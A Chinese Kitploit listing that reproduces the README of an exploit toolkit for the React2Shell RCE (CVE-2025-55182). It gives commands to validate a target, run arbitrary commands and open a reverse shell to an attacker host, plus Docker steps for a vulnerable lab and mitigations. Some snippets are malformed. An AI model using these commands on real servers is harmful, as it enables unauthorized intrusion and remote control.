Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 一个简单的工具包,用于验证、利用并通过 react2Shell Next.js RCE 获取交互式 shell。 | Kitploit
工具/GitHubGitHub/j4ck3lsyn-gen2/cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育远程访问工具Payload 开发
GitHubj4ck3lsyn-gen2/cve-2025-55182

CVE-2025-55182

一个简单的工具包,用于验证、利用并通过 react2Shell Next.js RCE 获取交互式 shell。

查看仓库
35个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182: React2Shell - Next.js 远程代码执行工具包

CVE-2025-55182 CVSS License

[!WARNING] 此工具仅用于授权测试和教育目的。未经授权的网络访问和数据窃取是非法的。使用此工具前,用户须确保拥有相应的授权。

概述

本仓库包含一个简易工具包,用于验证、利用 CVE-2025-55182(又名 React2Shell)并获得交互式 shell。这是一个关键的预认证远程代码执行 (RCE) 漏洞,存在于 React Server Components (RSC) 中,影响版本 19.0.0、19.1.0、19.1.1 和 19.2.0。

该漏洞源于 React Flight 协议中的不安全反序列化,允许未经身份验证的攻击者在易受攻击的服务器上执行任意代码。该漏洞于 2025 年 12 月 3 日披露,CVSS 评分为 10.0(严重)。它主要影响 React Server Components,但对使用 RSC 的框架(如 Next.js)也有影响。

注意: 此工具包仅用于教育和研究目的。未经授权利用漏洞是非法且不道德的。请负责任地使用,仅在你拥有或拥有明确测试权限的系统上使用。

受影响的组件

  • React Server Components:版本 19.0.0、19.1.0、19.1.1、19.2.0
  • 相关框架:Next.js(在某些上下文中可能通过 CVE-2025-66478 受影响)
  • 利用向量:RSC 负载中的不安全反序列化,可在无需身份验证的情况下实现 RCE。

有关更多详情,请参阅官方公告:

  • NVD CVE-2025-55182
React 安全公告
  • Wiz 关于 React2Shell 的博客

  • 用法


    功能

    • 验证:检查目标是否易受 CVE-2025-55182 攻击。
    • 利用:构造负载以执行任意命令。
    • 交互式 Shell:获得反向 shell 以实现持久访问。
    • 支持 Python 3.x,依赖极少。

    要求

    • Python 3.8+
    • 所需库:requests、argparse(通过 pip install -r requirements.txt 安装)

    安装

    Venv 安装

    1. 拉取仓库
    root@kitploit:~
    git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
    cd CVE-2025-55182
    
    1. 虚拟环境
    root@kitploit:~
    python3 -m venv CVE202555182Venv
    python3 -m pip install -r requirements.txt
    
    1. 激活
    root@kitploit:~
    source CVE202555182Venv/bin/activate[.fish]
    

    本地安装

    1. 克隆仓库:
      root@kitploit:~
      git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
      cd CVE-2025-55182
      
    2. 安装依赖:
      root@kitploit:~
      pip install -r requirements.txt
      

    用法

    主脚本是 sploit.py。使用以下选项运行:

    root@kitploit:~
    python sploit.py --help
    

    选项

    • --target <URL>:目标 URL(例如 http://vulnerable-site.com)。
    • --mode <validate|sploit|shell>:操作模式。
      • validate:检查漏洞而不进行利用。
      • sploit:执行自定义命令。
      • shell:建立交互式反向 shell。
    • --command <CMD>:要执行的命令(sploit 模式必需)。
    • --lhost <IP>:反向 shell 的本地主机(shell 模式必需)。
    • --lport <PORT>:反向 shell 的本地端口(默认:4444)。

    示例

    1. 验证漏洞:

      root@kitploit:~
      python sploit.py --target http://example.com --mode validate
      
    2. 利用并执行命令:

      root@kitploit:~
      python sploit.py --target http://example.com --mode sploit --command "whoami"
      
    3. 获得交互式 Shell: 首先设置监听器(例如 nc -lvnp 4444),然后:

      root@kitploit:~
      python sploit.py --target http://example.com --mode shell --lhost 192.168.1.100 --lport 4444
      

    工作原理

    1. 漏洞检测:发送特制的 RSC 负载以检测反序列化缺陷。
    2. 负载构造:利用不安全反序列化通过 React 的 Flight 协议注入代码。
    3. Shell 访问:通过执行一个回连到攻击者机器的负载,升级为反向 shell。

    技术深入阅读:

    • Datadog 安全实验室分析
    • Dynatrace 博客

    执行示例


    Docker 安装

    root@kitploit:~
    
    {
      "dependencies": {
        "next": "14.3.0-canary.77",
        "react": "19.0.0",
        "react-dom": "19.0.0"
      },
      "scripts": {
        "dev": "next dev",
        "build": "next build",
        "start": "next start"
      }
    }
    

    完全删除 tsconfig.json(这是破坏构建的关键)

    root@kitploit:~
    
    rm tsconfig.json
    

    创建最低要求的 App Router 文件

    root@kitploit:~
    
    mkdir -p app
    
    # app/layout.tsx
    cat > app/layout.tsx << 'EOF'
    import "./globals.css";
    
    export default function RootLayout({
      children,
    }: {
      children: React.ReactNode;
    }) {
      return (
        <html lang="en">
          <body>{children}</body>
        </html>
      );
    }
    

    app/globals.css(可以基本为空)

    root@kitploit:~
    echo "/* minimal css - required by Next.js */" > app/globals.css
    

    app/page.tsx(你的真实漏洞页面放在这里 - 示例存根)

    root@kitploit:~
    cat > app/page.tsx << 'EOF'
    export default function Home() {
      return (
        <main>
          <h1>react2shell 实验室运行中!</h1>
          <p>开始利用 → /api/vulnerable-endpoint</p>
        </main>
      );
    }
    

    创建最终的防弹 Dockerfile(确切内容)

    root@kitploit:~
    
    FROM node:20-alpine
    
    WORKDIR /app
    
    # 仅复制包文件(更好的缓存)
    COPY package*.json ./
    
    # 使用旧版对等依赖项安装依赖(此旧版 canary 需要)
    RUN npm install --legacy-peer-deps
    
    # 复制应用其余部分
    COPY . .
    
    # 删除 tsconfig.json 以免 Next.js 尝试自动安装 TypeScript(这是杀手锏)
    RUN rm -f tsconfig.json
    
    # 构建 Next.js 应用
    RUN npm run build
    
    # 暴露端口
    EXPOSE 3000
    
    # 启动应用
    CMD ["npm", "start"]
    

    构建并运行(这些命令现在完美工作)

    root@kitploit:~
    
    docker build -t react2shell .
    docker run -d -p 3000:3000 --name react2shell react2shell
    

    在浏览器中打开

    → http://localhost:3000你已完成。容器在 <2 秒内启动,并准备好进行原型污染 → RCE 链。可选一行命令以随时销毁并重启:bash

    root@kitploit:~
    docker rm -f react2shell && docker run -d -p 3000:3000 --name react2shell react2shell
    

    缓解措施

    • 将 React 更新至 19.2.1 或更高版本。
    • 如果不需要,禁用或限制 React Server Components。
    • 监控利用尝试,因为已观察到国家支持的行为者(例如中国关联团体)迅速针对该 CVE。

    参见 AWS 安全博客 获取威胁情报。

    免责声明

    此工具按“原样”提供,不附带任何担保。作者不对因使用本工具包造成的任何误用或损害负责。在测试漏洞之前,务必获得许可。

    贡献

    欢迎拉取请求!如需重大更改,请先开启 issue。

    许可证

    本项目根据 MIT 许可证授权 - 参见 LICENSE 文件了解详情。

    参考文献

    • Cisco 公告
    • Palo Alto Unit 42 报告
    • CMU ISO 新闻
    • Cloudflare 博客
    • Huntress 博客
    • JFrog 博客
    • Elastic Security
    Your Image Badge
    下载工具